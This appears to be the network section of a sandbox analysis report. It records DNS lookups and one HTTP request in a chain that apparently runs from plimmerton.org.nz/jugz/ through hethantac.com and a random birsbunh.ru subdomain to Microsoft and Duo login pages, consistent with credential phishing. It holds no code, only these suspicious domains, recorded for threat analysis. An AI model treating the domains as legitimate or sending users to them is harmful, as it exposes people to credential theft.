                                                                                                                                          Nov 18, 2024 06:47:22.519120932 CET192.168.2.161.1.1.1c28d(Port unreachable)Destination Unreachable
                                                                                                                                          Nov 18, 2024 06:47:36.173875093 CET192.168.2.161.1.1.1c2ba(Port unreachable)Destination Unreachable
                                                                                                                                          Nov 18, 2024 06:47:37.856642962 CET192.168.2.161.1.1.1c2ba(Port unreachable)Destination Unreachable
                                                                                                                                          Nov 18, 2024 06:47:42.140724897 CET192.168.2.161.1.1.1c2e8(Port unreachable)Destination Unreachable
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Nov 18, 2024 06:47:18.814091921 CET192.168.2.161.1.1.10x4e9fStandard query (0)www.google.kiA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:18.815201044 CET192.168.2.161.1.1.10x297Standard query (0)www.google.ki65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:20.293605089 CET192.168.2.161.1.1.10x5227Standard query (0)plimmerton.org.nzA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:20.293729067 CET192.168.2.161.1.1.10x23bcStandard query (0)plimmerton.org.nz65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:21.315447092 CET192.168.2.161.1.1.10x913cStandard query (0)plimmerton.org.nzA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.483021021 CET192.168.2.161.1.1.10x2cddStandard query (0)supernova.hethantac.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.483346939 CET192.168.2.161.1.1.10xb27Standard query (0)supernova.hethantac.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.497113943 CET192.168.2.161.1.1.10x3260Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.497281075 CET192.168.2.161.1.1.10xd1d6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.811589003 CET192.168.2.161.1.1.10x60c0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.811781883 CET192.168.2.161.1.1.10xabb7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.812160969 CET192.168.2.161.1.1.10x824aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.812323093 CET192.168.2.161.1.1.10xce78Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.812640905 CET192.168.2.161.1.1.10x2261Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.812804937 CET192.168.2.161.1.1.10xb60dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.811235905 CET192.168.2.161.1.1.10x12eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.811414003 CET192.168.2.161.1.1.10x5ec1Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.828246117 CET192.168.2.161.1.1.10x98e2Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.828432083 CET192.168.2.161.1.1.10x1587Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.593018055 CET192.168.2.161.1.1.10x4decStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.593269110 CET192.168.2.161.1.1.10xfec4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.607702971 CET192.168.2.161.1.1.10x28e0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.607897043 CET192.168.2.161.1.1.10xd1e2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:27.831547022 CET192.168.2.161.1.1.10x1e80Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:27.831737041 CET192.168.2.161.1.1.10x80a1Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:35.911341906 CET192.168.2.161.1.1.10x93c9Standard query (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:35.911494970 CET192.168.2.161.1.1.10xf29cStandard query (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.541086912 CET192.168.2.161.1.1.10xea0cStandard query (0)excel.office.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.541518927 CET192.168.2.161.1.1.10x6fe3Standard query (0)excel.office.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.549437046 CET192.168.2.161.1.1.10x3f5bStandard query (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.549577951 CET192.168.2.161.1.1.10x97adStandard query (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:38.496248960 CET192.168.2.161.1.1.10xe668Standard query (0)www.microsoft365.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:38.496366978 CET192.168.2.161.1.1.10xa063Standard query (0)www.microsoft365.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:39.396884918 CET192.168.2.161.1.1.10x5a42Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:39.397062063 CET192.168.2.161.1.1.10x99bStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.128200054 CET192.168.2.161.1.1.10x1572Standard query (0)www.microsoft365.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.128362894 CET192.168.2.161.1.1.10x14deStandard query (0)www.microsoft365.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.666227102 CET192.168.2.161.1.1.10x14e6Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.666414976 CET192.168.2.161.1.1.10xbb9cStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.283593893 CET192.168.2.161.1.1.10x7c5dStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.283855915 CET192.168.2.161.1.1.10xb0b0Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:08.873028040 CET192.168.2.161.1.1.10xbec3Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:08.873224020 CET192.168.2.161.1.1.10x493fStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:12.432691097 CET192.168.2.161.1.1.10xa84aStandard query (0)sso-dbbfec7f.sso.duosecurity.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:12.433152914 CET192.168.2.161.1.1.10x8e1cStandard query (0)sso-dbbfec7f.sso.duosecurity.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:13.540061951 CET192.168.2.161.1.1.10xa14eStandard query (0)cisco.login.duosecurity.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:13.540365934 CET192.168.2.161.1.1.10x765eStandard query (0)cisco.login.duosecurity.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:16.227941036 CET192.168.2.161.1.1.10xf358Standard query (0)cisco.login.duosecurity.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:16.227977991 CET192.168.2.161.1.1.10xa654Standard query (0)cisco.login.duosecurity.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:24.631359100 CET192.168.2.161.1.1.10x1be3Standard query (0)ux-asset-commercial.duosecurity.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:24.631757021 CET192.168.2.161.1.1.10xe96Standard query (0)ux-asset-commercial.duosecurity.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:26.361298084 CET192.168.2.161.1.1.10xb74bStandard query (0)ux-asset-commercial.duosecurity.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:26.361454010 CET192.168.2.161.1.1.10x2e9Standard query (0)ux-asset-commercial.duosecurity.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:27.841169119 CET192.168.2.161.1.1.10x97b2Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:27.841353893 CET192.168.2.161.1.1.10x6682Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Nov 18, 2024 06:47:18.820971966 CET1.1.1.1192.168.2.160x4e9fNo error (0)www.google.ki142.250.186.131A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:21.467499018 CET1.1.1.1192.168.2.160x5227No error (0)plimmerton.org.nz192.185.150.174A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:21.467549086 CET1.1.1.1192.168.2.160x913cNo error (0)plimmerton.org.nz192.185.150.174A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.497044086 CET1.1.1.1192.168.2.160x2cddNo error (0)supernova.hethantac.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.497044086 CET1.1.1.1192.168.2.160x2cddNo error (0)supernova.hethantac.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.503670931 CET1.1.1.1192.168.2.160x3260No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.503820896 CET1.1.1.1192.168.2.160xd1d6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:22.519025087 CET1.1.1.1192.168.2.160xb27No error (0)supernova.hethantac.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.818903923 CET1.1.1.1192.168.2.160x60c0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.818903923 CET1.1.1.1192.168.2.160x60c0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.818903923 CET1.1.1.1192.168.2.160x60c0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.818903923 CET1.1.1.1192.168.2.160x60c0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.818928957 CET1.1.1.1192.168.2.160xce78No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.819025040 CET1.1.1.1192.168.2.160x824aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.819025040 CET1.1.1.1192.168.2.160x824aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.819717884 CET1.1.1.1192.168.2.160x2261No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.819717884 CET1.1.1.1192.168.2.160x2261No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:23.819813013 CET1.1.1.1192.168.2.160xb60dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.818458080 CET1.1.1.1192.168.2.160x12eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.818458080 CET1.1.1.1192.168.2.160x12eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.818458080 CET1.1.1.1192.168.2.160x12eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.818458080 CET1.1.1.1192.168.2.160x12eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.836097956 CET1.1.1.1192.168.2.160x1587No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.836381912 CET1.1.1.1192.168.2.160x98e2No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:24.836381912 CET1.1.1.1192.168.2.160x98e2No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.599982977 CET1.1.1.1192.168.2.160xfec4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.600579977 CET1.1.1.1192.168.2.160x4decNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.600579977 CET1.1.1.1192.168.2.160x4decNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.615600109 CET1.1.1.1192.168.2.160xd1e2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.615621090 CET1.1.1.1192.168.2.160x28e0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:25.615621090 CET1.1.1.1192.168.2.160x28e0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:27.838620901 CET1.1.1.1192.168.2.160x1e80No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:36.109797001 CET1.1.1.1192.168.2.160x93c9No error (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:36.109797001 CET1.1.1.1192.168.2.160x93c9No error (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:36.173779011 CET1.1.1.1192.168.2.160xf29cNo error (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.605618954 CET1.1.1.1192.168.2.160x6fe3No error (0)excel.office.comhome-redirects.www.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.605618954 CET1.1.1.1192.168.2.160x6fe3No error (0)home-redirects.www.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.611088991 CET1.1.1.1192.168.2.160xea0cNo error (0)excel.office.comhome-redirects.www.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.611088991 CET1.1.1.1192.168.2.160xea0cNo error (0)home-redirects.www.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.638339043 CET1.1.1.1192.168.2.160x3f5bNo error (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.638339043 CET1.1.1.1192.168.2.160x3f5bNo error (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:37.856513977 CET1.1.1.1192.168.2.160x97adNo error (0)jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru65IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:38.504340887 CET1.1.1.1192.168.2.160xe668No error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:38.504340887 CET1.1.1.1192.168.2.160xe668No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:38.504378080 CET1.1.1.1192.168.2.160xa063No error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:38.504378080 CET1.1.1.1192.168.2.160xa063No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:39.404021978 CET1.1.1.1192.168.2.160x5a42No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:39.404056072 CET1.1.1.1192.168.2.160x99bNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:40.966331005 CET1.1.1.1192.168.2.160x73c2No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:40.966331005 CET1.1.1.1192.168.2.160x73c2No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.106489897 CET1.1.1.1192.168.2.160x4c0No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.106489897 CET1.1.1.1192.168.2.160x4c0No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.136132956 CET1.1.1.1192.168.2.160x14deNo error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.136132956 CET1.1.1.1192.168.2.160x14deNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.136168957 CET1.1.1.1192.168.2.160x1572No error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:42.136168957 CET1.1.1.1192.168.2.160x1572No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.673192978 CET1.1.1.1192.168.2.160x14e6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.673192978 CET1.1.1.1192.168.2.160x14e6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.673192978 CET1.1.1.1192.168.2.160x14e6No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.673305035 CET1.1.1.1192.168.2.160xbb9cNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:43.673305035 CET1.1.1.1192.168.2.160xbb9cNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.290519953 CET1.1.1.1192.168.2.160xb0b0No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.290519953 CET1.1.1.1192.168.2.160xb0b0No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.290644884 CET1.1.1.1192.168.2.160x7c5dNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.290644884 CET1.1.1.1192.168.2.160x7c5dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:47:45.290644884 CET1.1.1.1192.168.2.160x7c5dNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:08.879919052 CET1.1.1.1192.168.2.160xbec3No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:08.880173922 CET1.1.1.1192.168.2.160x493fNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:12.455331087 CET1.1.1.1192.168.2.160xa84aNo error (0)sso-dbbfec7f.sso.duosecurity.com35.71.186.151A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:12.455331087 CET1.1.1.1192.168.2.160xa84aNo error (0)sso-dbbfec7f.sso.duosecurity.com52.223.1.163A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:13.577562094 CET1.1.1.1192.168.2.160x765eNo error (0)cisco.login.duosecurity.comsso-dbbfec7f.sso.duosecurity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:13.588326931 CET1.1.1.1192.168.2.160xa14eNo error (0)cisco.login.duosecurity.comsso-dbbfec7f.sso.duosecurity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:13.588326931 CET1.1.1.1192.168.2.160xa14eNo error (0)sso-dbbfec7f.sso.duosecurity.com35.71.186.151A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:13.588326931 CET1.1.1.1192.168.2.160xa14eNo error (0)sso-dbbfec7f.sso.duosecurity.com52.223.1.163A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:16.248250008 CET1.1.1.1192.168.2.160xa654No error (0)cisco.login.duosecurity.comsso-dbbfec7f.sso.duosecurity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:16.256958008 CET1.1.1.1192.168.2.160xf358No error (0)cisco.login.duosecurity.comsso-dbbfec7f.sso.duosecurity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:16.256958008 CET1.1.1.1192.168.2.160xf358No error (0)sso-dbbfec7f.sso.duosecurity.com52.223.1.163A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:16.256958008 CET1.1.1.1192.168.2.160xf358No error (0)sso-dbbfec7f.sso.duosecurity.com35.71.186.151A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:24.649712086 CET1.1.1.1192.168.2.160x1be3No error (0)ux-asset-commercial.duosecurity.com18.66.102.12A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:24.649712086 CET1.1.1.1192.168.2.160x1be3No error (0)ux-asset-commercial.duosecurity.com18.66.102.5A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:24.649712086 CET1.1.1.1192.168.2.160x1be3No error (0)ux-asset-commercial.duosecurity.com18.66.102.75A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:24.649712086 CET1.1.1.1192.168.2.160x1be3No error (0)ux-asset-commercial.duosecurity.com18.66.102.88A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:26.376190901 CET1.1.1.1192.168.2.160xb74bNo error (0)ux-asset-commercial.duosecurity.com18.66.102.12A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:26.376190901 CET1.1.1.1192.168.2.160xb74bNo error (0)ux-asset-commercial.duosecurity.com18.66.102.5A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:26.376190901 CET1.1.1.1192.168.2.160xb74bNo error (0)ux-asset-commercial.duosecurity.com18.66.102.75A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:26.376190901 CET1.1.1.1192.168.2.160xb74bNo error (0)ux-asset-commercial.duosecurity.com18.66.102.88A (IP address)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:28.012454033 CET1.1.1.1192.168.2.160x6682No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 18, 2024 06:48:28.013226986 CET1.1.1.1192.168.2.160x97b2No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          • www.google.ki
                                                                                                                                          • plimmerton.org.nz
                                                                                                                                            • supernova.hethantac.com
                                                                                                                                          • https:
                                                                                                                                            • code.jquery.com
                                                                                                                                            • cdnjs.cloudflare.com
                                                                                                                                            • challenges.cloudflare.com
                                                                                                                                            • jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru
                                                                                                                                            • aadcdn.msauth.net
                                                                                                                                            • aadcdn.msftauth.net
                                                                                                                                            • sso-dbbfec7f.sso.duosecurity.com
                                                                                                                                            • cisco.login.duosecurity.com
                                                                                                                                            • ux-asset-commercial.duosecurity.com
                                                                                                                                          • fs.microsoft.com
                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                          • a.nel.cloudflare.com
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1649708192.185.150.174806248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 18, 2024 06:47:21.473875046 CET437OUTGET /jugz/ HTTP/1.1
                                                                                                                                          Host: plimmerton.org.nz
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Nov 18, 2024 06:47:22.237104893 CET1236INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:22 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade, Keep-Alive
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Keep-Alive: timeout=5, max=75
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Content-Type: text/html; charset=UTF-8
